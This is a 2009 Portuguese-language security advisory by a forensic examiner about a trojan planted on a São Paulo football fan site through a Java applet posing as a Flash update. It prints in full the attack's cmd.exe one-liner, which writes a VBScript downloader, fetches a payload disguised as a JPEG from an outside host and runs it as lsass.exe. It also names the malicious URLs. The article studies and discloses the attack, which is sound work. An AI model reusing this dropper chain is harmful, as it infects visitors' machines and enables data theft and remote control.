Detectada: 16-10-2009

Um trojan detectado ontem às 15:30 por nossa equipe no site do SPNET (aparente site de torcida e de vendas de produtos do São Paulo) http://www.saopaulofc.com.br/, permitia a infecção de usuários que acessassem o site. A técnica cracker, semelhante a uma falha encontrada em site de operadora de telefonia móvel no mês passado, consistia em um Java Applet implantado na página principal do site, através de vulnerabilidade no código e no servidor de Internet da página do Time.

Assim ao acessar o site, usuários se depararam com uma falsa mensagem para atualização do Plugin do Flash Player, dispositivo necessário para processar páginas dinâmicas:

Porém ao clicar em “RUN” pensando que iriam instalar um plugin necessário para visualizar o site, em verdade usuários executavam um código applet extremamente bem realizado e que construía e rodava em tempo de execução um trojan na máquina, possibilitando o monitoramento pelo cracker e até mesmo a invasão:

De modo que pelo site do SPNET, o Applet malicioso processava o arquivo Java em http://www.sparesweb.com/images/flash.jar (No ar até o fechamento deste artigo 17:18 horas GTM-3), site hospedado no exterior, que por sua vez processava no computador da vítima a criação de um arquivo VbScript chamado “poq.vbs”, linha por linha, vejamos:

cmd.exe /c

echo Const adTypeBinary = 1 > poq.vbs

& echo Const adSaveCreateOverWrite = 2 >> poq.vbs

& echo Dim BinaryStream >> poq.vbs

& echo Set BinaryStream = CreateObject(“ADODB.Stream”) >> poq.vbs & echo BinaryStream.Type = adTypeBinary >> poq.vbs

& echo BinaryStream.Open >> poq.vbs

& echo BinaryStream.Write BinaryGetURL(Wscript.Arguments(0)) >> poq.vbs

& echo BinaryStream.SaveToFile Wscript.Arguments(1), adSaveCreateOverWrite >> poq.vbs

& echo Function BinaryGetURL(URL) >> poq.vbs

& echo Dim Http >> poq.vbs

& echo Set Http = CreateObject(“WinHttp.WinHttpRequest.5.1″) >> poq.vbs

& echo Http.Open “GET”, URL, False >> poq.vbs

& echo Http.Send >> poq.vbs

& echo BinaryGetURL = Http.ResponseBody >> poq.vbs & echo End Function >> poq.vbs

& echo Set shell = CreateObject(“WScript.Shell”) >> poq.vbs

& echo shell.Run “lsass.exe” >> poq.vbs

& start poq.vbs http://www.mustrad.org.uk/ses/reviews/adobe.jpg lsass.exe’>
Como se vê, de modo oculto e imperceptível o Código na Página do SPNET construía em questão de segundos no PC do visitante um arquivo chamado “poq.vbs”. Este era então iniciado com o comando “start” passando como parâmetro o link a seguir que fazia o download para a máquina do usuário do trojan em http://www.mustrad.org.uk/ses/reviews/adobe.jpg lsass.exe, que aparentemente infectava o processo Isass.exe, vejamos:

O que aparentemente era uma imagem .jpg na verdade caracterizava-se em um programa malicioso que explora vulnerabilidades de servidores web e de hosts, conforme verificamos de uma análise hexadecimal da imagem:

Aparentemente aplicação desenvolvida em Linguagem Visual contando com Forms ocultos e Timer para processar na máquina da vítima de tempo em tempo, conforme strings que detectamos no adobe.jpg:

Tal vulnerabilidade estava ativa quando do fechamento deste artigo. Tal fato demonstra o aperfeiçoamento do cybercrime no Brasil, que explora páginas de credibilidade e a princípio à prova de falhas para plantar códigos que podem infectar usuários que as acessem.

Deve-se destacar que esta técnica de ataque é inédita à medida em que o código malicioso no site do Time não baixava um trojan no computador do usuário, como é comum, mas “escrevia” literalmente o trojan no usuário vítima, e aí sim o processava-o fazendo com que outro arquivo malicioso fosse baixado para a máquina, tudo,  de forma imperceptível.

As ameaças que exploram tais vulnerabilidades é a captura de dados digitados e a execução remota de comandos, capazes de gerar danos ou a subtração de informações dos infectados. Pondera-se que em muitos casos pessoas com browsers (navegadores) com nível mínimo de privacidade podem ter baixado o trojan sem qualquer tela de diálogo prévia, ou seja, sem a informação para clicar em ‘RUN’. Recomenda-se a exclusão de eventual arquivo “poq.vbs” na máquina e execução de anti-vírus/trojan atualizado.

José Antonio Milagre

Perito em Crimes Eletrônicos (Sênior Examiner)

LegalTECH

(11) 3014-0056 (11) 9461-0823

www.twitter.com/periciadigital